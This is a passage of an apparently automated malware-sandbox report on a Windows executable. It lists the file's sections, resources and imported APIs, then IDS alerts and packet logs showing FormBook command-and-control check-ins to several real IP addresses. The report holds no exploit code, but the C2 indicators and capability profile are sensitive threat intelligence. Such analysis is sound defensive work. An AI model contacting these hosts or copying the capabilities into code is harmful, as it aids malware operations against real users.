                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                            RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                            RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                            RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                            RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                            RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                            RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                            RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                            RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                            RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                            RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                            RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                            RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                            RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                            RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                            RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                            RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                            RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                            RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                            Imports

                                                                            DLLImport
                                                                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                            GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                            OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-05T15:22:20.383399+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449730TCP
                                                                            2024-11-05T15:22:51.689391+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.455453TCP
                                                                            2024-11-05T15:22:56.464517+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.455454154.23.184.6080TCP
                                                                            2024-11-05T15:22:56.464517+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.455454154.23.184.6080TCP
                                                                            2024-11-05T15:23:20.484708+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455564209.74.95.2980TCP
                                                                            2024-11-05T15:23:23.026740+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455578209.74.95.2980TCP
                                                                            2024-11-05T15:23:25.564381+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455594209.74.95.2980TCP
                                                                            2024-11-05T15:23:28.155331+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.455609209.74.95.2980TCP
                                                                            2024-11-05T15:23:28.155331+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.455609209.74.95.2980TCP
                                                                            2024-11-05T15:23:34.284729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455644136.143.186.1280TCP
                                                                            2024-11-05T15:23:36.834522+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455659136.143.186.1280TCP
                                                                            2024-11-05T15:23:39.407521+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455674136.143.186.1280TCP
                                                                            2024-11-05T15:23:41.940689+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.455686136.143.186.1280TCP
                                                                            2024-11-05T15:23:41.940689+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.455686136.143.186.1280TCP
                                                                            2024-11-05T15:23:48.464607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455722133.130.35.9080TCP
                                                                            2024-11-05T15:23:51.027181+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455729133.130.35.9080TCP
                                                                            2024-11-05T15:23:53.581375+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455730133.130.35.9080TCP
                                                                            2024-11-05T15:23:56.136508+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.455731133.130.35.9080TCP
                                                                            2024-11-05T15:23:56.136508+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.455731133.130.35.9080TCP
                                                                            2024-11-05T15:24:01.885452+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4557323.33.130.19080TCP
                                                                            2024-11-05T15:24:05.324202+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4557333.33.130.19080TCP
                                                                            2024-11-05T15:24:07.009732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4557343.33.130.19080TCP
                                                                            2024-11-05T15:24:09.525201+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4557353.33.130.19080TCP
                                                                            2024-11-05T15:24:09.525201+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4557353.33.130.19080TCP
                                                                            2024-11-05T15:24:15.620966+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45573631.31.196.1780TCP
                                                                            2024-11-05T15:24:18.167829+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45573731.31.196.1780TCP
                                                                            2024-11-05T15:24:20.714806+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45573831.31.196.1780TCP
                                                                            2024-11-05T15:24:23.261899+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45573931.31.196.1780TCP
                                                                            2024-11-05T15:24:23.261899+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45573931.31.196.1780TCP
                                                                            2024-11-05T15:24:29.154609+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455740172.96.187.6080TCP
                                                                            2024-11-05T15:24:31.721130+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455741172.96.187.6080TCP
                                                                            2024-11-05T15:24:34.222625+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455742172.96.187.6080TCP
                                                                            2024-11-05T15:24:36.778518+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.455743172.96.187.6080TCP
                                                                            2024-11-05T15:24:36.778518+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.455743172.96.187.6080TCP
                                                                            2024-11-05T15:24:42.790343+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455744161.97.142.14480TCP
                                                                            2024-11-05T15:24:45.557370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455745161.97.142.14480TCP
                                                                            2024-11-05T15:24:48.166703+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455746161.97.142.14480TCP
                                                                            2024-11-05T15:24:50.689017+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.455747161.97.142.14480TCP
                                                                            2024-11-05T15:24:50.689017+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.455747161.97.142.14480TCP
                                                                            2024-11-05T15:24:56.545697+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45574813.248.169.4880TCP
                                                                            2024-11-05T15:24:59.100062+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45574913.248.169.4880TCP
                                                                            2024-11-05T15:25:01.620535+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45575013.248.169.4880TCP
                                                                            2024-11-05T15:25:04.198110+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45575113.248.169.4880TCP
                                                                            2024-11-05T15:25:04.198110+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45575113.248.169.4880TCP
                                                                            2024-11-05T15:25:10.405488+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.455752104.16.6.25380TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 5, 2024 15:22:55.431335926 CET5545480192.168.2.4154.23.184.60
                                                                            Nov 5, 2024 15:22:55.436155081 CET8055454154.23.184.60192.168.2.4
                                                                            Nov 5, 2024 15:22:55.436301947 CET5545480192.168.2.4154.23.184.60
                                                                            Nov 5, 2024 15:22:55.444257021 CET5545480192.168.2.4154.23.184.60
                                                                            Nov 5, 2024 15:22:55.450201988 CET8055454154.23.184.60192.168.2.4
                                                                            Nov 5, 2024 15:22:56.420778036 CET8055454154.23.184.60192.168.2.4
                                                                            Nov 5, 2024 15:22:56.464517117 CET5545480192.168.2.4154.23.184.60
                                                                            Nov 5, 2024 15:22:56.616839886 CET8055454154.23.184.60192.168.2.4
                                                                            Nov 5, 2024 15:22:56.617006063 CET5545480192.168.2.4154.23.184.60
                                                                            Nov 5, 2024 15:22:56.618449926 CET5545480192.168.2.4154.23.184.60
                                                                            Nov 5, 2024 15:22:56.623296976 CET8055454154.23.184.60192.168.2.4
                                                                            Nov 5, 2024 15:23:19.785290003 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:19.791614056 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:19.791702032 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:19.800028086 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:19.806301117 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.484478951 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.484637976 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.484649897 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.484708071 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:20.485023022 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.485035896 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.485045910 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.485079050 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:20.485099077 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:20.485805988 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.485819101 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.485833883 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.485846043 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.485862970 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:20.485887051 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:20.489850998 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.489929914 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.489942074 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.489984035 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:20.522625923 CET8055564209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:20.522706985 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:21.308348894 CET5556480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:22.328069925 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:22.334557056 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:22.334629059 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:22.345351934 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:22.353593111 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.026525021 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.026648045 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.026660919 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.026740074 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:23.026921034 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.026936054 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.026949883 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.026985884 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:23.027019978 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:23.027790070 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.027806044 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.027820110 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.027844906 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:23.028564930 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.028615952 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:23.031691074 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.031898022 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.031909943 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.031964064 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:23.067404985 CET8055578209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:23.067523956 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:23.856086016 CET5557880192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:24.874381065 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:24.879981995 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.880120993 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:24.890872002 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:24.896379948 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896478891 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896497965 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896507025 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896518946 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896528959 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896538973 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896730900 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:24.896902084 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564204931 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564311028 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564326048 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564380884 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.564815044 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564829111 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.564873934 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.565268993 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565282106 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565293074 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565304995 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.565326929 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.565352917 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.566135883 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.566190004 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.569329023 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.569482088 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.569493055 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.569539070 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:25.604131937 CET8055594209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:25.604243994 CET5559480192.168.2.4209.74.95.29
